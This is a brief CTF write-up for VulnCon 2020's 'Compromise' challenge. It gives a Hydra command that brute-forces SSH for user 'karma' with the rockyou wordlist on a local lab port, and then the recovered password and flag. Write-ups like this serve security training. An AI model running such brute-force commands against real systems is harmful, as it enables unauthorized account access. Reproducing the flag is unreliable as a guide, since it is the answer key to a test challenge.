VULNCON CTF 2020 - Compromise writeup

less than 1 minute read

Description:

What account was the username and password of the compromised user ?

NOTE: Use file given in 1st Chall Attack

Flag Format: vulncon{username_password}

Author - White_Wolf

Solution

I used Hydra to brute-force the SSH password:

hydra -l karma -P rockyou.txt 127.0.0.1 -t 64 -s 2222 -V ssh

The Attack chall gave the information about the targeted user, and I used the rockyou wordlist to find the password, which is godisgood:

vulncon{karma_godisgood}

Twitter Facebook LinkedIn

Creating my own /dev/null

4 minute read

How I implemented a very simple /dev/null for learning about device drivers

Linux kernel QEMU setup

3 minute read

Compiling your own Linux kernel and running it on QEMU.

Linux Kernel stuck in QEMU: Decompressing Linux… Parsing ELF… forever

3 minute read

Decompressing Linux… Parsing ELF… And nothing happens! What to do when a Linux Kernel does not work in QEMU.

Spread operator leading to XSS

1 minute read

Writeup for the Web Utils chall in DiceCTF 2021.

Víctor Cora Colombo